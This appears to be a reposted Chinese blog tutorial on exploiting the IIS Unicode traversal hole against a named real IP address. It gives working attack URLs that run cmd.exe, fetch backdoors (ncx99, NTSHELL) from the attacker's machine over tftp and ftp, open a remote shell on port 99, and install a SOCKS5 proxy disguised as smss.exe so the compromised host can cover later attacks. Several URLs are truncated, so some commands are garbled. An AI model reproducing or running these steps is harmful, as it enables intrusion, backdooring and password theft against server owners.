自从IIS服务出现UNICODE漏洞之后，攻击NT机器变成傻瓜化，任何人只要略懂一点黑软件的使用就能对有UNICODE漏洞(包括二次解码漏洞)的机器进行入侵!
首先简单介绍一下UNICODE漏洞
微软的IIS 4.0和5.0都存在利用扩展UNICODE字符取代"/"和""而能利用"../"目录遍历的漏洞。未经授权的用户可能利用IUSR_machinename帐号进行入侵。
该帐号在默认情况下属于Everyone和Users组的成员，因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除，修改或执行，就如同一个用户成功登陆所能完成的一样。
虽然微软发布了补丁，如果没有将可执行的目录删除，还会存在二次解码漏洞!

各位可以使用现成的黑软对目标机器进行检测，如本军团啊达编写的"红舞鞋unicode扫描器"、安全焦点的"X-SCAN 0.61"、小榕的“流光”等等.....
本人常用"X-SCAN"，因为它除了能扫描UNICODE漏洞之外还有其它用途!所以这次我就拿"X-SCAN"作为教学。

首先，到安全焦点主页(http://www.Xfocus.org)下载"X-SCAN",解压后运行"xscan_gui.exe"。(本次教学会有实例出现，所以在"扫描项目"中只选"IIS漏洞"和不使用插件)在"扫描范围"填入"216.167.117.53"然后开始扫描(会出现一个DOS窗口)。
完成(窗口消失)后按"查看结果",如果目标存在UNCODE漏洞就会在“【IIS检测结果】:”中显示出来!

大家不用担心安全问题，本次教学的老外主机稍后我会用出适当的处理!
到这一步，第一小节完成，各位有什么问题可以提出来，如果没有我就继续!

在IE地址栏中打入：
http://216.167.117.53/msadc/..%255c....exe?/c+dir+c:
就会将目标机器的C目录被列出。
现在就到上传木马或后门之类的东西，方法有很多种，本人最常用到的方法是利用echo回显、管道，如：ECHO HACK BY YOUCK>INDEX.HTM。这样就建立了一个内容为HACK BY YOUCK的INDEX.HTM文件。
但是IIS加载程序检测到有CMD.EXE或者COMMAND.COM串就要检测特殊字符 “&|(,;%<>”，如果发现有这些字符就会返回500错误，所以不能直接使用CMD.EEX加管道符等。网上有很多说发现"引号字符是可以利用的，但我试过后不行。
经过我反复测试，只要将CMD.exe拷贝改成其它名就行了!(如果目标机器是NFTS格式的，WINNT目录是不能写操作的，所以要把他拷贝到根目录或者TEMP目录)
以下的例子中我是将他拷贝到c:winntsystem32目录中并改名为C.EXE
http://216.167.117.53/msadc/..%255c...2cmd.exe+c.exe
首先验证一下，执行：
http://216.167.117.53/msadc/..%255c....exe?/c+dir+c:
如果成功就会在IE中出现目标的C盘文件和目录。
我在这介绍两种上传文件的方法，一种比较适合非NT/2000学员，另一种最好是NT/2000是学员使用!
一、首先，下载http://www.cners.com/tools/unicode.zip
解压后有如下文件：
tftpd32.exe（一个FTP服务器）
ncx99.exe（telnet 到99端口）
这两个大家都熟悉吧，其他的不用管。
运行tftpd32.exe
这是一个小巧的FTP服务器，在运行它之前，建议关闭其他FTP服务器，保持tftpd运行，这时你的机器已经是一个FTP服务器了。
回到你的浏览器，在地址栏里填入：
http://216.167.117.53/msadc/..%255c...cmd.exe?/c+tftp -i ???.???.???.??? GET ncx99.exe c:\winnt\help\temp\ncx99.exe
???.???.???.???为你自己的IP，注意：c:\winnt\help\temp\ncx99.exe 其中c:\winnt\help\temp\为主机服务器目录，要看主机的具体情况而定。
然后等待...大概3分钟...IE浏览器左下角显示完成，红色漏斗消失，这时ncx99.exe已经上传到主机c:winnthelp emp目录了，您可以自己检查一下。
再使用如下调用来执行ncx99.exe
http://216.167.117.53/msadc/..%255c... emp cx99.exe
然后您就可以 telnet 216.167.117.53 99

二、首先你把需要上传的文件放到自已的FTP目录中，本人喜欢使用NTSHELL，因为它功能强大，可以查看进程和中止进程，盗取密码等等(它的自带使用说明)，所以这次就上传它!(下载地址：http://cntroopers.myetang.com/weapons2.html)
在浏览器地址栏中填入：(其中XXX.XXX.XXX.XXX是你自己的IP地址)
http://216.167.117.53/msadc/..%255c...XXX.XXX.XXX.XXX>ftp.bin
http://216.167.117.53/msadc/..%255c...+echo+anonymous>>ftp.bin
http://216.167.117.53/msadc/..%255c...e?/c+echo+guest>>ftp.bin
http://216.167.117.53/msadc/..%255c...?/c+echo+binary>>ftp.bin
http://216.167.117.53/msadc/..%255c...get+ntshell.exe>>ftp.bin
http://216.167.117.53/msadc/..%255c...NTShellGINA.dll>>ftp.bin
http://216.167.117.53/msadc/..%255c...o+get+psapi.dll>>ftp.bin
http://216.167.117.53/msadc/..%255c...et+Explorer.exe>>ftp.bin
http://216.167.117.53/msadc/..%255c...xe?/c+echo+quit>>ftp.bin
接着验证一下是否正确：
http://216.167.117.53/msadc/..%255c.../c+type+ftp.bin
OK之后就执行：
http://216.167.117.53/msadc/..%255c...+ftp+-s:ftp.bin
稍后片刻再验证文件是否上传成功：
http://216.167.117.53/msadc/..%255c...32/c.exe?/c+dir
到了这一步，你就可以在IE地址栏运行木马：
http://216.167.117.53/msadc/..%255c...?/c+ntshell.exe
之后就可以在本地运行ntshellc.exe然后连上去目标机器了。

到了这一步，你就可以进入目标机器，但是权根还很低，至于怎样提升权限，各位可以参考论坛中的相关文章!

本人比较喜欢使用第二种方法，我通常在别的机器中放好上将要用到的文件，日后直接连上去下载就行，安全多了，：)

各位有什么问题可以即时提出，下一节将介绍如何在目标机器上开设代理服务!
这样，菜鸟都可以拥有属于自已的SOCK5代理服务器，日后进攻安全多了~

首先介绍一下需要用到的文件
1.sanke的代理跳板(SkSockServer)
下载地址：http://snake12.top263.net/SkSockServer/SkSockServer.htm
2.eBorder-client
下载地址：http://www.proxy365.com/

首先，找一台有UNICODE的WIN 2000肉机，将代理跳板(SkSockServer.exe)上传到目标机器在中，
并改名为Smss.exe(以下利用到我发现的WIN 2000漏洞)。然后在IE地址栏执行Smss.exe -debug 1028
这样目标机器就成为了SOCK5代理，端口为：1028
如果1028端口被占用，就改用其它的。
至于eBorder-client是代理软件，你也可以用sockCAP32或者其它支持SOCK5的代理软件~
在此就用以上的肉机进行教学!
运行NTSHELL：
http://216.167.117.53/msadc/..%255c...emp tshell.exe
在本地运行NTSHELLC.exe
连上目标机器：
o 216.167.117.53
输入默认口令：
let me in
再在IE地址栏填入：
http://216.167.117.53/msadc/..%255c...exe+-debug+1028
然后在NTSHELLC中看看他的进程：
?pslist
将没用的进程KILL掉：
?pskill XXX(XXX是进程ID,千万不要将Smss.exe进程也KILL 掉啊，：))

这样目标机器就开设了SOCK5代理服务，刚才开的进程连管理员也无法KILL掉，这是我发现的WIN2000任务管理器漏洞~
因为UNICODE得到的权根很低，所以不能作为服务运行，当然也可以提升权根，把SkSockServer作为服务运行!
至于怎样提升权限，在此我不作保绍了，日后有机会再介绍~
验证代理服务是否正常运行有很多种方法，比较方便就用QQ来验让一下，够方便嘛~
当然不用NTSHELL也可以，但这样会留下几个CMD.exe(或者C.exe)进程的，容易被管理员发现。
自已KILL掉他总比目标机器的管理员KILL掉好~
NTSHELL还有很多功能可用，一举两得，：)

最后，介绍一下我发现的WIN 2000任务管理器漏洞。
我把他命名为：WIN2000任务管理器漏洞
漏洞原因是WIN　2000任务管理器没有验证进程名字的大小写，从而将一些跟系统关键进程名字相同的进程误认为系统关键进程，因而任务管理器无法中止其进程~
如果你的系统是WIN 2000，可以作如下试验：
将CMD.exe复制并改名为：Smss.exe或者sMss.exe、smSs.exe
主要有最少一个字母是大写就行，因为smss.exe是系统关键进程，而WIN 2000没有验证大小写。
运行后在“任务管理器”中就会无法中止其进程!
当然在桌面可以关掉的~
如果是利用UNICODE漏洞运行，任何人都没有办法用“任务管理器”中止.
因为UNICODE是使用IUSR_machinename帐号，而IUSR_machinename帐号是IIS的匿名访问 Internet 信息服务的内置帐号，不能直接登录，当然就不能在桌面关掉此程序了~
但是利用其它工具也可将此进程KILL掉的!　

来自 “ ITPUB博客 ” ，链接：http://blog.itpub.net/10294527/viewspace-124662/，如需转载，请注明出处，否则将追究法律责任。